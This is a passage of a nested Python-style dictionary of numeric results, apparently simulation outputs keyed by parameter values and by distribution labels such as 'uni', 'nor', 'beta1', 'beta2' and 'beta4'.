{'uni': 0.8480075940431231, 'nor': 1.005613242317469, 'beta1': 0.9038607200973079, 'beta2': 1.4360275830921037, 'beta4': 0.765583568088014}, 75: {'uni': 0.8379740876341786, 'nor': 1.0190740775977551, 'beta1': 0.8762896090907831, 'beta2': 1.1997858513807305, 'beta4': 0.7991634940817146}, 50: {'uni': 0.8474335678968142, 'nor': 0.966687963122637, 'beta1': 0.8814985864516113, 'beta2': 1.1013494852594226, 'beta4': 0.814899411714437}, 30: {'uni': 0.8727086391467926, 'nor': 0.8921547081202534, 'beta1': 0.8539393755115126, 'beta2': 0.9699137113255722, 'beta4': 0.8265640852509611}, 20: {'uni': 0.8509580839243661, 'nor': 0.8976419303592276, 'beta1': 0.8377850051812428, 'beta2': 0.9490003133987858, 'beta4': 0.822873280879306}, 10: {'uni': 0.8070223792543272, 'nor': 0.8222121101020897, 'beta1': 0.8169261630244183, 'beta2': 0.8687590176135066, 'beta4': 0.8358281226159047}}, 400: {1000: {'uni': 0.8322925059461799, 'nor': 2.772959248898575, 'beta1': 0.8893671382511937, 'beta2': 6.069963280541391, 'beta4': 0.4477691999805573}, 750: {'uni': 0.8613686583710596, 'nor': 2.2314767356879326, 'beta1': 0.8568956660509862, 'beta2': 4.854992785999708, 'beta4': 0.4832858323318025}, 500: {'uni': 0.8567699511619379, 'nor': 1.8200600461414693, 'beta1': 0.9080785163321283, 'beta2': 3.4157894226102203, 'beta4': 0.551367596609852}, 400: {'uni': 0.8369044265082584, 'nor': 1.5845080295693856, 'beta1': 0.8500625111572069, 'beta2': 2.9594155017882446, 'beta4': 0.5474817232894605}, 300: {'uni': 0.8687488891518946, 'nor': 1.4620428679624027, 'beta1': 0.8877443382363509, 'beta2': 2.481100386426921, 'beta4': 0.5937679151105709}, 200: {'uni': 0.8268590674018326, 'nor': 1.2437500818930782, 'beta1': 0.8799053584315863, 'beta2': 1.9723014293020296, 'beta4': 0.6786183666437543}, 150: {'uni': 0.8589374510858506, 'nor': 1.1816870309605243, 'beta1': 0.8718362510385768, 'beta2': 1.6860574439544969, 'beta4': 0.7224050217211732}, 100: {'uni': 0.8637240017119076, 'nor': 1.0352677456743422, 'beta1': 
0.8417017245035276, 'beta2': 1.409613185720384, 'beta4': 0.7405058894550209}, 75: {'uni': 0.8637532375150383, 'nor': 0.9779373487935997, 'beta1': 0.8781013460358983, 'beta2': 1.237799529212922, 'beta4': 0.763051811457541}, 50: {'uni': 0.8469820141871477, 'nor': 0.9527738404825348, 'beta1': 0.854958580126025, 'beta2': 1.1302429451594769, 'beta4': 0.8011092866946141}, 30: {'uni': 0.8736551317015678, 'nor': 0.8951809427802495, 'beta1': 0.8825847779488676, 'beta2': 0.976513604820869, 'beta4': 0.8236922508203844}, 20: {'uni': 0.8445914174745024, 'nor': 0.8978427140297524, 'beta1': 0.8285384005464761, 'beta2': 0.9441752062117178, 'beta4': 0.8079416993063016}, 10: {'uni': 0.8059582553072695, 'nor': 0.8422271125818357, 'beta1': 0.822948579547678, 'beta2': 0.8530417818519627, 'beta4': 0.7908692241190146}}, 300: {1000: {'uni': 0.85015130833887, 'nor': 3.434760468098905, 'beta1': 0.8571894410585443, 'beta2': 6.921244428990534, 'beta4': 0.4092729787000081}, 750: {'uni': 0.862825596472843, 'nor': 2.7875235825000546, 'beta1': 0.8942786992828993, 'beta2': 5.640485944820529, 'beta4': 0.4523328926527227}, 500: {'uni': 0.8612530107937411, 'nor': 2.087138712332073, 'beta1': 0.8499689110732196, 'beta2': 3.9314480214815304, 'beta4': 0.48599991641199985}, 400: {'uni': 0.8719345715637321, 'nor': 1.948459695654461, 'beta1': 0.8535901226550221, 'beta2': 3.376116676834797, 'beta4': 0.5307479361442003}, 300: {'uni': 0.8670545417493539, 'nor': 1.5564108606749094, 'beta1': 0.8498653001731661, 'beta2': 2.8470550015231573, 'beta4': 0.5693301542257994}, 200: {'uni': 0.8668097879968475, 'nor': 1.3376277704327313, 'beta1': 0.8315542163435912, 'beta2': 2.2063579986840036, 'beta4': 0.6039260854671632}, 150: {'uni': 0.8271864622954613, 'nor': 1.2200355388246191, 'beta1': 0.883742467942023, 'beta2': 1.869013842158086, 'beta4': 0.643155393507137}, 100: {'uni': 0.8638972306464799, 'nor': 1.1342641709471044, 'beta1': 0.8598375912189091, 'beta2': 1.5120532688493489, 'beta4': 0.7403717834928402}, 75: 
{'uni': 0.8583473461451383, 'nor': 1.0800462905879058, 'beta1': 0.8923649808568489, 'beta2': 1.3317255953293965, 'beta4': 0.7345166246898442}, 50: {'uni': 0.8746732518178894, 'nor': 0.9675091473720824, 'beta1': 0.869571585857279, 'beta2': 1.1552038645884999, 'beta4': 0.758415241068141}, 30: {'uni': 0.8799939789005814, 'nor': 0.9517419294376883, 'beta1': 0.8743679176044513, 'beta2': 1.033882047029358, 'beta4': 0.820234969285508}, 20: {'uni': 0.8351927773424345, 'nor': 0.9115728880522416, 'beta1': 0.8661553510614836, 'beta2': 0.9463253532297905, 'beta4': 0.8267082483693564}, 10: {'uni': 0.8406316325477106, 'nor': 0.8314613208194097, 'beta1': 0.8415689332783691, 'beta2': 0.8676067009565547, 'beta4': 0.7923546623661532}}, 200: {1000: {'uni': 0.8857663238193778, 'nor': 4.680179487924737, 'beta1': 0.8596985445949961, 'beta2': 8.640727300137126, 'beta4': 0.3894629855731228}, 750: {'uni': 0.8822609513200822, 'nor': 3.6240629787778325, 'beta1': 0.8509327610699031, 'beta2': 7.06440107867899, 'beta4': 0.4136128719602394}, 500: {'uni': 0.8951511408281749, 'nor': 2.706478161877119, 'beta1': 0.8750179255888083, 'beta2': 4.923212625453092, 'beta4': 0.4438676650195852}, 400: {'uni': 0.8621099039944393, 'nor': 2.3112226100492634, 'beta1': 0.8637393226967995, 'beta2': 4.142311379028304, 'beta4': 0.4989802884758265}, 300: {'uni': 0.8815086783155325, 'nor': 1.973012357083618, 'beta1': 0.8855622176886478, 'beta2': 3.245637925919703, 'beta4': 0.5014064302476238}, 200: {'uni': 0.8328108622368053, 'nor': 1.5986517188378813, 'beta1': 0.8670516338633621, 'beta2': 2.441582595720951, 'beta4': 0.5675354711561659}, 150: {'uni': 0.8509108075288516, 'nor': 1.437846992896105, 'beta1': 0.836851186717404, 'beta2': 1.9740942359159892, 'beta4': 0.613923547729645}, 100: {'uni': 0.8768933007965606, 'nor': 1.2219082590934622, 'beta1': 0.8710445433259488, 'beta2': 1.6652834592979155, 'beta4': 0.6807453974973048}, 75: {'uni': 0.8696669504918266, 'nor': 1.124306793828307, 'beta1': 0.8708924475587642, 
'beta2': 1.4585340544518133, 'beta4': 0.6921789139786938}, 50: {'uni': 0.890137756708636, 'nor': 1.0380991897651526, 'beta1': 0.9038916870128674, 'beta2': 1.2617159118800856, 'beta4': 0.737301894421063}, 30: {'uni': 0.8577280992654713, 'nor': 0.9922674847278834, 'beta1': 0.8495021132831815, 'beta2': 1.1148815215500807, 'beta4': 0.7716495960817314}, 20: {'uni': 0.8719153771105802, 'nor': 0.9596683679575053, 'beta1': 0.8591127846243085, 'beta2': 0.9966712227887798, 'beta4': 0.8093952871372214}, 10: {'uni': 0.8302695587113106, 'nor': 0.8708970655099307, 'beta1': 0.823064138178113, 'beta2': 0.8889092964712426, 'beta4': 0.7977767176653532}}, 150: {1000: {'uni': 0.8986138998052507, 'nor': 5.7834675088135725, 'beta1': 0.8490270056828785, 'beta2': 10.407206757701623, 'beta4': 0.3788903299147765}, 750: {'uni': 0.8647457935668315, 'nor': 4.597985491272376, 'beta1': 0.8826314946034581, 'beta2': 7.917017378008792, 'beta4': 0.3939613164237079}, 500: {'uni': 0.8814291871824029, 'nor': 3.2742679017557763, 'beta1': 0.8645904562415648, 'beta2': 5.474819990031853, 'beta4': 0.4201942139903767}, 400: {'uni': 0.8719096515847061, 'nor': 2.8229044013952347, 'beta1': 0.8701785960891302, 'beta2': 4.581611606290644, 'beta4': 0.4331012710758666}, 300: {'uni': 0.8854658111693259, 'nor': 2.34542108556634, 'beta1': 0.8409188898825175, 'beta2': 3.5960889166936094, 'beta4': 0.4756845407835292}, 200: {'uni': 0.8701625486580659, 'nor': 1.8358292727217536, 'beta1': 0.8532097190695673, 'beta2': 2.72141338340365, 'beta4': 0.5228322599770573}, 150: {'uni': 0.8883732054354728, 'nor': 1.6784341004883028, 'beta1': 0.8480800478874988, 'beta2': 2.3548864538236587, 'beta4': 0.5478575722636306}, 100: {'uni': 0.8848899944215347, 'nor': 1.39003511176849, 'beta1': 0.8928556014396124, 'beta2': 1.7581183428124922, 'beta4': 0.6319233921298026}, 75: {'uni': 0.8476576587132466, 'nor': 1.2109186887878762, 'beta1': 0.8549274883770003, 'beta2': 1.5588624857940563, 'beta4': 0.6711749929357153}, 50: {'uni': 
0.878992168637968, 'nor': 1.0893345758288648, 'beta1': 0.8571678620038059, 'beta2': 1.2936364210958133, 'beta4': 0.6911762280795586}, 30: {'uni': 0.8386807997491547, 'nor': 0.982291187821282, 'beta1': 0.8808367008354709, 'beta2': 1.0816297459507884, 'beta4': 0.7557102904498407}, 20: {'uni': 0.8307168833220502, 'nor': 0.9767678583343402, 'beta1': 0.8564594109233339, 'beta2': 0.989911410784959, 'beta4': 0.748952291872636}, 10: {'uni': 0.8194083425516434, 'nor': 0.8775832793387287, 'beta1': 0.8471358818316647, 'beta2': 0.8995129578120127, 'beta4': 0.7862318620719233}}, 100: {1000: {'uni': 0.8946637816542238, 'nor': 8.603780168858798, 'beta1': 0.8819450133887767, 'beta2': 12.286473618618768, 'beta4': 0.3681993165409592}, 750: {'uni': 0.9047095939989102, 'nor': 6.544331357001899, 'beta1': 0.8768385993384246, 'beta2': 9.510849254140902, 'beta4': 0.3748657037149706}, 500: {'uni': 0.8828573534389809, 'nor': 4.589167917409369, 'beta1': 0.8687021342851984, 'beta2': 6.4569490799550255, 'beta4': 0.4012132277414978}, 400: {'uni': 0.8816824734545268, 'nor': 3.8702556930171457, 'beta1': 0.868410778897242, 'beta2': 5.358536995714846, 'beta4': 0.39772599926896646}, 300: {'uni': 0.8487402016109327, 'nor': 3.13370246160681, 'beta1': 0.8839192006334508, 'beta2': 4.377387315114399, 'beta4': 0.43260286490656286}, 200: {'uni': 0.8550948483316095, 'nor': 2.2941222796515564, 'beta1': 0.8840654113992507, 'beta2': 3.1793274396848537, 'beta4': 0.4693380740694391}, 150: {'uni': 0.8726854391556464, 'nor': 1.9987190523931557, 'beta1': 0.8640065941351514, 'beta2': 2.4550201259308606, 'beta4': 0.5029338662023729}, 100: {'uni': 0.8744011176190648, 'nor': 1.599629546114851, 'beta1': 0.8758350528124487, 'beta2': 1.8341702678156442, 'beta4': 0.5535398055771565}, 75: {'uni': 0.8816360483295717, 'nor': 1.396209177505365, 'beta1': 0.8588496604966374, 'beta2': 1.7587314717424098, 'beta4': 0.6000984093869451}, 50: {'uni': 0.8444691076907881, 'nor': 1.2083130325494273, 'beta1': 0.8577643593273495, 'beta2': 
1.4376280924624785, 'beta4': 0.6608219126680412}, 30: {'uni': 0.8186744117785408, 'nor': 1.070965603891437, 'beta1': 0.8483324727506986, 'beta2': 1.1580907306458454, 'beta4': 0.7234734928182613}, 20: {'uni': 0.8400701531478934, 'nor': 1.000113988644385, 'beta1': 0.8321822290696924, 'beta2': 1.0710298849251567, 'beta4': 0.7339870282448464}, 10: {'uni': 0.8382328001002571, 'nor': 0.9092521075722466, 'beta1': 0.8359072328233461, 'beta2': 0.9120018345512748, 'beta4': 0.7663868495863666}}, 75: {1000: {'uni': 0.9392011817188017, 'nor': 10.904728772367289, 'beta1': 0.866624607543039, 'beta2': 13.539885930108083, 'beta4': 0.3534109865942192}, 750: {'uni': 0.9355897301990589, 'nor': 8.230208100553527, 'beta1': 0.8573793409512389, 'beta2': 10.554777001721034, 'beta4': 0.3707815481206261}, 500: {'uni': 0.902737130958842, 'nor': 5.9005448659039414, 'beta1': 0.9039620810225308, 'beta2': 7.009224078205305, 'beta4': 0.37752549840973754}, 400: {'uni': 0.8820840867138475, 'nor': 4.906683628702614, 'beta1': 0.8471201075727584, 'beta2': 5.811385171318147, 'beta4': 0.37395562054497417}, 300: {'uni': 0.8905762412970645, 'nor': 3.8692194969852842, 'beta1': 0.9120410272155509, 'beta2': 4.664194484656855, 'beta4': 0.4126825810690872}, 200: {'uni': 0.8389878062923508, 'nor': 2.8755206530986688, 'beta1': 0.8502879253313526, 'beta2': 3.3092550616564202, 'beta4': 0.42921847952639935}, 150: {'uni': 0.8439913453823732, 'nor': 2.2602699891688856, 'beta1': 0.8817858849869306, 'beta2': 2.6797847545171676, 'beta4': 0.47138132435008684}, 100: {'uni': 0.8589328530157215, 'nor': 1.8035701933261568, 'beta1': 0.8723921800108287, 'beta2': 1.9841585248871425, 'beta4': 0.5132672551619654}, 75: {'uni': 0.8494008654992535, 'nor': 1.6071498176774344, 'beta1': 0.8921558615811434, 'beta2': 1.7948054307860677, 'beta4': 0.5600945143875852}, 50: {'uni': 0.8459905263294217, 'nor': 1.3456446878132973, 'beta1': 0.8360437432777298, 'beta2': 1.4098100528261963, 'beta4': 0.5995871991066353}, 30: {'uni': 
0.863255907688344, 'nor': 1.163832926785131, 'beta1': 0.8610017576182266, 'beta2': 1.2221297578160732, 'beta4': 0.6852793799758119}, 20: {'uni': 0.8208301547311144, 'nor': 1.0466688062181275, 'beta1': 0.8659319938555088, 'beta2': 1.0233244108524449, 'beta4': 0.7240872799802124}, 10: {'uni': 0.8032328211939312, 'nor': 0.9417402156036838, 'beta1': 0.8526278553950033, 'beta2': 0.9217056736337736, 'beta4': 0.7718520630849283}}, 50: {1000: {'uni': 1.0415495975920712, 'nor': 16.265730359177034, 'beta1': 0.8877957838662055, 'beta2': 16.885442852467367, 'beta4': 0.3448739500232382}, 750: {'uni': 1.0098033949308896, 'nor': 12.258570778017333, 'beta1': 0.8706995791907859, 'beta2': 12.395166093820881, 'beta4': 0.35315381524036327}, 500: {'uni': 0.9415139858342592, 'nor': 8.481807472429985, 'beta1': 0.8972503865903044, 'beta2': 8.392611665283725, 'beta4': 0.36998606207623813}, 400: {'uni': 0.9115614150434282, 'nor': 6.710526205260556, 'beta1': 0.8363890434236055, 'beta2': 6.893481197785906, 'beta4': 0.35909227964437845}, 300: {'uni': 0.8787877860539303, 'nor': 5.174832246974513, 'beta1': 0.8566295227226275, 'beta2': 5.494166649585702, 'beta4': 0.3906665116470583}, 200: {'uni': 0.868109213219911, 'nor': 3.8785570981039923, 'beta1': 0.8486507394057397, 'beta2': 3.967316649529905, 'beta4': 0.4099010863230901}, 150: {'uni': 0.8521655040528395, 'nor': 3.089208594179127, 'beta1': 0.86485525155687, 'beta2': 3.1562227864035775, 'beta4': 0.4259916065124458}, 100: {'uni': 0.8538795335041026, 'nor': 2.345951444856802, 'beta1': 0.8576683025117604, 'beta2': 2.34371617917428, 'beta4': 0.47209240963168714}, 75: {'uni': 0.8518076855463557, 'nor': 2.004537103880557, 'beta1': 0.8924709495111173, 'beta2': 1.943645059238237, 'beta4': 0.5024138107270238}, 50: {'uni': 0.8529988890643148, 'nor': 1.637600402682281, 'beta1': 0.887282270801599, 'beta2': 1.5942525719928833, 'beta4': 0.5461737896321196}, 30: {'uni': 0.8317247039979097, 'nor': 1.2728847122349543, 'beta1': 0.8763974125117077, 'beta2': 
1.2510718185241683, 'beta4': 0.6168812853181134}, 20: {'uni': 0.8288102680813932, 'nor': 1.127591734617398, 'beta1': 0.8484767896870734, 'beta2': 1.0683362295171508, 'beta4': 0.6634916799393047}, 10: {'uni': 0.8176133987807528, 'nor': 0.962361595088012, 'beta1': 0.8463373485431211, 'beta2': 0.9792459537116653, 'beta4': 0.7132996896249393}}, 30: {1000: {'uni': 1.2696860283761329, 'nor': 27.028546181049798, 'beta1': 0.8886841713466621, 'beta2': 21.836331871174327, 'beta4': 0.34885048965467425}, 750: {'uni': 1.1759720018152577, 'nor': 20.606898542988638, 'beta1': 0.8823359568565259, 'beta2': 16.492206692516675, 'beta4': 0.3456789491663497}, 500: {'uni': 1.0607922271898333, 'nor': 13.499694108821545, 'beta1': 0.8704093259926938, 'beta2': 10.840977904557175, 'beta4': 0.3586589082724464}, 400: {'uni': 1.034149292980726, 'nor': 10.918561084901162, 'beta1': 0.8744363285476298, 'beta2': 8.989655953402785, 'beta4': 0.35894729709119183}, 300: {'uni': 0.9693906483358444, 'nor': 8.511512725546728, 'beta1': 0.8913582403756317, 'beta2': 6.734747049938925, 'beta4': 0.3571048621894059}, 200: {'uni': 0.9295062768532519, 'nor': 5.726145369760396, 'beta1': 0.8464608450876929, 'beta2': 4.740491290627747, 'beta4': 0.3753071091113352}, 150: {'uni': 0.8911914980160859, 'nor': 4.786527437358327, 'beta1': 0.9029710546460754, 'beta2': 3.627949786933054, 'beta4': 0.3868813723011823}, 100: {'uni': 0.8741205713557936, 'nor': 3.3912944344384437, 'beta1': 0.8420955501315833, 'beta2': 2.740025646984923, 'beta4': 0.42282517623248606}, 75: {'uni': 0.8417413679465983, 'nor': 2.770535795664202, 'beta1': 0.8689267525581056, 'beta2': 2.3351824154600016, 'beta4': 0.4355723263901833}, 50: {'uni': 0.8293019485037857, 'nor': 2.1331783667990547, 'beta1': 0.8636890393573666, 'beta2': 1.795449942087839, 'beta4': 0.47663699780502283}, 30: {'uni': 0.8398719438451165, 'nor': 1.5873110864904567, 'beta1': 0.8458052978100878, 'beta2': 1.3157854252669225, 'beta4': 0.542696670833237}, 20: {'uni': 0.8588110918111577, 
'nor': 1.370992161006879, 'beta1': 0.8127388456820281, 'beta2': 1.2066500169529317, 'beta4': 0.6136617948645082}, 10: {'uni': 0.8082099171087873, 'nor': 1.122302969663073, 'beta1': 0.7984881402335584, 'beta2': 0.9808222408488511, 'beta4': 0.7086263964034699}}, 20: {1000: {'uni': 1.7845594214279576, 'nor': 40.15832565029172, 'beta1': 0.950259894237407, 'beta2': 25.861562337744196, 'beta4': 0.32973420092003286}, 750: {'uni': 1.5897522441647864, 'nor': 28.315155657619325, 'beta1': 0.913891705486057, 'beta2': 20.117293413810955, 'beta4': 0.34329017661554695}, 500: {'uni': 1.3030580424170426, 'nor': 20.253228491861286, 'beta1': 0.9220502576370694, 'beta2': 13.583692929451516, 'beta4': 0.35295824845181184}, 400: {'uni': 1.2511593986123553, 'nor': 16.721863866209368, 'beta1': 0.8890682031702455, 'beta2': 11.11481009070622, 'beta4': 0.3504685746126408}, 300: {'uni': 1.1556472143034846, 'nor': 12.530843145240851, 'beta1': 0.8995531892253813, 'beta2': 8.478893847650728, 'beta4': 0.34635706601890454}, 200: {'uni': 1.002551669149528, 'nor': 8.576294654093017, 'beta1': 0.8723105746829944, 'beta2': 5.853099794656523, 'beta4': 0.36846801010142255}, 150: {'uni': 0.9694379710633484, 'nor': 6.690519847813086, 'beta1': 0.8717961407072875, 'beta2': 4.597201584965225, 'beta4': 0.3659628260777635}, 100: {'uni': 0.8977854726841326, 'nor': 4.692828531090058, 'beta1': 0.8496010281273996, 'beta2': 3.1550068582035578, 'beta4': 0.38511701524257447}, 75: {'uni': 0.9118678625047828, 'nor': 3.7324572320229095, 'beta1': 0.8652199493328219, 'beta2': 2.529492997234143, 'beta4': 0.40778432043338764}, 50: {'uni': 0.8543398305647835, 'nor': 2.876515939258069, 'beta1': 0.83415119798805, 'beta2': 1.978057747859159, 'beta4': 0.4411959818288761}, 30: {'uni': 0.8433281461496579, 'nor': 1.9748223737762594, 'beta1': 0.8359570278817351, 'beta2': 1.463749824817638, 'beta4': 0.4833063970512745}, 20: {'uni': 0.8332039379907832, 'nor': 1.5857551546674844, 'beta1': 0.8245999245393716, 'beta2': 1.2217108424486114, 
'beta4': 0.5416079971879648}, 10: {'uni': 0.767644168526127, 'nor': 1.186352156756191, 'beta1': 0.8038565208106804, 'beta2': 0.9942753593007874, 'beta4': 0.631678251643074}}, 10: {1000: {'uni': 3.753193315878337, 'nor': 80.54961219964801, 'beta1': 1.4544532440986977, 'beta2': 37.457752389369944, 'beta4': 0.33787557256732886}, 750: {'uni': 3.13190540427256, 'nor': 61.39195913384035, 'beta1': 1.2853163542779982, 'beta2': 28.219925280709226, 'beta4': 0.3438604922632593}, 500: {'uni': 2.361928334320761, 'nor': 39.264786613414124, 'beta1': 1.0987827263867904, 'beta2': 19.44333576209149, 'beta4': 0.34485169875041716}, 400: {'uni': 2.0476194993736376, 'nor': 32.94817315559009, 'beta1': 1.0488861998480152, 'beta2': 15.54348581454614, 'beta4': 0.33462832934226017}, 300: {'uni': 1.7346022453973275, 'nor': 24.123522158092758, 'beta1': 0.9961117172285985, 'beta2': 11.539236263935074, 'beta4': 0.3497737633950961}, 200: {'uni': 1.4525939834033061, 'nor': 16.34875245088017, 'beta1': 0.9253876022802889, 'beta2': 8.020657570999116, 'beta4': 0.34879974403231523}, 150: {'uni': 1.298454489895215, 'nor': 12.039103036503901, 'beta1': 0.8983179227349697, 'beta2': 6.1480857184206545, 'beta4': 0.3515031726202898}, 100: {'uni': 1.149106274875983, 'nor': 8.792370330870405, 'beta1': 0.8859050703287877, 'beta2': 4.127419446528227, 'beta4': 0.37328300271926307}, 75: {'uni': 1.0510563523184537, 'nor': 6.690824582353118, 'beta1': 0.8676483571212735, 'beta2': 3.261862421040156, 'beta4': 0.35955743890308756}, 50: {'uni': 0.944355604551499, 'nor': 4.8498605482734485, 'beta1': 0.856890203472039, 'beta2': 2.40472627933374, 'beta4': 0.3740413835304806}, 30: {'uni': 0.856343008929495, 'nor': 3.122509717131945, 'beta1': 0.7969111331070415, 'beta2': 1.6917780539337604, 'beta4': 0.420410921911824}, 20: {'uni': 0.8184308142900829, 'nor': 2.404727094095177, 'beta1': 0.8086310697032824, 'beta2': 1.4107687480292843, 'beta4': 0.44807980574077305}, 10: {'uni': 0.7832503930172614, 'nor': 1.5626869225976665, 
'beta1': 0.7853435742092469, 'beta2': 1.0642285862729415, 'beta4': 0.5256048778718274}}}, 0.01: {1000: {1000: {'uni': 0.7219503597168808, 'nor': 1.3522899382499511, 'beta1': 0.7503888090005709, 'beta2': 4.359712279210015, 'beta4': 0.47805541074462554}, 750: {'uni': 0.7460653360509083, 'nor': 1.2215802732877805, 'beta1': 0.7579034372202724, 'beta2': 3.44439122365882, 'beta4': 0.5013760660613135}, 500: {'uni': 0.7457104709224507, 'nor': 1.0274833085776511, 'beta1': 0.7356416860323749, 'beta2': 2.379942654242188, 'beta4': 0.5628465543348214}, 400: {'uni': 0.7540793490028289, 'nor': 0.9939475957798122, 'beta1': 0.7677563353825323, 'beta2': 2.085462426476235, 'beta4': 0.5902860977216214}, 300: {'uni': 0.7416999961068458, 'nor': 0.9093968404709234, 'beta1': 0.7454049674434894, 'beta2': 1.707950964614366, 'beta4': 0.6001696878842937}, 200: {'uni': 0.7524857828756578, 'nor': 0.890322894897767, 'beta1': 0.7254202434608807, 'beta2': 1.3850934656667797, 'beta4': 0.6253567875211119}, 150: {'uni': 0.7464000130882479, 'nor': 0.82772600390256, 'beta1': 0.748717836598423, 'beta2': 1.2348711064861624, 'beta4': 0.6676094543272186}, 100: {'uni': 0.7406116313995137, 'nor': 0.7846559695042307, 'beta1': 0.7436305573461189, 'beta2': 1.058180498214777, 'beta4': 0.6960649268744108}, 75: {'uni': 0.7336661138941689, 'nor': 0.7752977113565671, 'beta1': 0.7119633999030476, 'beta2': 0.9638602094125377, 'beta4': 0.7106380565315166}, 50: {'uni': 0.7274345032232149, 'nor': 0.7769370576160674, 'beta1': 0.7283032566959488, 'beta2': 0.9082889542215573, 'beta4': 0.7042713454877574}, 30: {'uni': 0.71539271539834, 'nor': 0.7636883535575116, 'beta1': 0.7265786350524956, 'beta2': 0.8451376503815184, 'beta4': 0.7172879038073893}, 20: {'uni': 0.7278822712528917, 'nor': 0.7329383859926495, 'beta1': 0.7426269815726088, 'beta2': 0.7846227593442195, 'beta4': 0.7144990540387691}, 10: {'uni': 0.7131138660193919, 'nor': 0.7161480646534595, 'beta1': 0.6990538369629343, 'beta2': 0.7376189274957015, 'beta4': 
0.7088112725925363}}, 750: {1000: {'uni': 0.7514448328173757, 'nor': 1.5690434935428623, 'beta1': 0.7238769915288217, 'beta2': 4.38682423614769, 'beta4': 0.4524323542299279}, 750: {'uni': 0.7455825696325514, 'nor': 1.3328601960899922, 'beta1': 0.7438570163136006, 'beta2': 3.355424284560506, 'beta4': 0.4758585436464304}, 500: {'uni': 0.7330809665950883, 'nor': 1.135828118704559, 'beta1': 0.7459578036681647, 'beta2': 2.338558656779778, 'beta4': 0.543469912113142}, 400: {'uni': 0.7393601770653746, 'nor': 1.052047627034842, 'beta1': 0.7600197916673754, 'beta2': 2.1262388399145316, 'beta4': 0.5680920375709674}, 300: {'uni': 0.733890553738948, 'nor': 0.9951567989849669, 'beta1': 0.7491899564747048, 'beta2': 1.7142789768265858, 'beta4': 0.5873317180036289}, 200: {'uni': 0.7173225588019696, 'nor': 0.9241399821663433, 'beta1': 0.7167646128108208, 'beta2': 1.398836761053942, 'beta4': 0.6156346475851152}, 150: {'uni': 0.7552102082425654, 'nor': 0.8640953826991624, 'beta1': 0.770371701027368, 'beta2': 1.2233959927790403, 'beta4': 0.6696303297293811}, 100: {'uni': 0.7586001636448041, 'nor': 0.8265445942127733, 'beta1': 0.7298586370318658, 'beta2': 1.0788951673020957, 'beta4': 0.6819565674039529}, 75: {'uni': 0.7339719193619441, 'nor': 0.7970213915919653, 'beta1': 0.7452981007326952, 'beta2': 0.9902033388465475, 'beta4': 0.6806705721923305}, 50: {'uni': 0.7426285460991999, 'nor': 0.784823983472302, 'beta1': 0.7328375072176379, 'beta2': 0.8989778928787314, 'beta4': 0.714999119165653}, 30: {'uni': 0.7540507423640944, 'nor': 0.7582186672393878, 'beta1': 0.7339734090546394, 'beta2': 0.8529443603173799, 'beta4': 0.7059507241941045}, 20: {'uni': 0.7201249000817622, 'nor': 0.7617493220181438, 'beta1': 0.7349074815395348, 'beta2': 0.7881594314228356, 'beta4': 0.7196526975796932}, 10: {'uni': 0.7153409619896742, 'nor': 0.7224788626089845, 'beta1': 0.7017555851627001, 'beta2': 0.7359482321541709, 'beta4': 0.685808672984458}}, 500: {1000: {'uni': 0.7380604623841498, 'nor': 
2.0074921408234596, 'beta1': 0.7259149617361781, 'beta2': 5.1534725835867174, 'beta4': 0.4016185019025364}, 750: {'uni': 0.7277313960695746, 'nor': 1.6968624841848041, 'beta1': 0.7395120438274015, 'beta2': 4.0638408872213905, 'beta4': 0.4252262089873473}, 500: {'uni': 0.7495634259353762, 'nor': 1.3803020407947926, 'beta1': 0.7247647863955615, 'beta2': 2.95719376036709, 'beta4': 0.48637810148569965}, 400: {'uni': 0.7497722433163603, 'nor': 1.2589603075934335, 'beta1': 0.7439095820905751, 'beta2': 2.474926128760821, 'beta4': 0.49292747162383926}, 300: {'uni': 0.722253811511448, 'nor': 1.1061656778845381, 'beta1': 0.7387074468238296, 'beta2': 2.040531745372352, 'beta4': 0.5439583012238866}, 200: {'uni': 0.7419144634436707, 'nor': 0.9866019092605993, 'beta1': 0.7485409246569181, 'beta2': 1.6217964319106442, 'beta4': 0.5938407647627634}, 150: {'uni': 0.7507584514333536, 'nor': 0.9112256273611522, 'beta1': 0.7583144421101103, 'beta2': 1.4136429869481633, 'beta4': 0.6219493991981659}, 100: {'uni': 0.7483473641741184, 'nor': 0.8696982703928622, 'beta1': 0.7458470511513203, 'beta2': 1.1900733793640232, 'beta4': 0.6404674789644428}, 75: {'uni': 0.7581297777885967, 'nor': 0.8098297138565111, 'beta1': 0.74147568796388, 'beta2': 1.036728255630718, 'beta4': 0.6638886698880033}, 50: {'uni': 0.7277428656725512, 'nor': 0.8328795823416434, 'beta1': 0.7504227439834543, 'beta2': 0.9543372753583443, 'beta4': 0.6832013312974475}, 30: {'uni': 0.7544258542081878, 'nor': 0.768097419973158, 'beta1': 0.7167797119759898, 'beta2': 0.8583509524300639, 'beta4': 0.6852309446092829}, 20: {'uni': 0.7254031250497417, 'nor': 0.7362340759894164, 'beta1': 0.7389112075834917, 'beta2': 0.8164314073450918, 'beta4': 0.7063892945802895}, 10: {'uni': 0.6955262901599432, 'nor': 0.7142489442262036, 'beta1': 0.6994344581806992, 'beta2': 0.750942354002658, 'beta4': 0.7099403799059699}}, 400: {1000: {'uni': 0.7364502180846917, 'nor': 2.284553312869663, 'beta1': 0.7541341170458651, 'beta2': 5.0818747242235025, 
'beta4': 0.3900704329365574}, 750: {'uni': 0.7504698065388657, 'nor': 1.938239865343596, 'beta1': 0.7769598575433235, 'beta2': 4.01597780597472, 'beta4': 0.40395786312151927}, 500: {'uni': 0.7508573312104527, 'nor': 1.5072813162623548, 'beta1': 0.7305280496529544, 'beta2': 2.857026217797966, 'beta4': 0.4547828036658211}, 400: {'uni': 0.7611248206328712, 'nor': 1.338550267958856, 'beta1': 0.7466143672126452, 'beta2': 2.5495916012797935, 'beta4': 0.4969149207948216}, 300: {'uni': 0.7424343806561035, 'nor': 1.231111156552096, 'beta1': 0.7344575668422653, 'beta2': 2.0773636667154585, 'beta4': 0.5079339216262199}, 200: {'uni': 0.7392633158240819, 'nor': 1.0377847828667477, 'beta1': 0.7586003850660703, 'beta2': 1.6153253239719372, 'beta4': 0.5722234547809886}, 150: {'uni': 0.7391428468766339, 'nor': 0.9949906865630406, 'beta1': 0.7379552345583523, 'beta2': 1.3631500709552795, 'beta4': 0.619870387049708}, 100: {'uni': 0.7356451707387796, 'nor': 0.9291460091070943, 'beta1': 0.7404914473665879, 'beta2': 1.2174882328266758, 'beta4': 0.6262899546773785}, 75: {'uni': 0.7623057151977248, 'nor': 0.8361834398991281, 'beta1': 0.7501586532707593, 'beta2': 1.0872819013301396, 'beta4': 0.6478743366728121}, 50: {'uni': 0.74349850126654, 'nor': 0.8384065389830003, 'beta1': 